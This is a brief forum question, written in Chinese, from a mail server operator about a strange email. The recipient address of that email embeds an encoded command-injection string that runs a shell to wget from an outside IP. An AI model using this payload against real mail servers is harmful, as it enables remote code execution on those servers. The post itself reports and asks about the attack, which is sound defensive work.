我操作自己的邮件服务器,有时,人们会向根帐户发送垃圾邮件或神秘内容。最近,我收到一封空邮件,地址是:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@mydomain.tld _
该字符串中的第二个 IP 地址似乎归我租用服务器的同一托管服务所有。run和wget在我看来非常可疑,但我在 Internet 上没有发现任何关于此类攻击的信息。
根据服务器的邮件日志,该邮件是从 148.72.206.111 发送的。但是,发件人字段设置为[email protected]。
有谁知道,这是什么意思?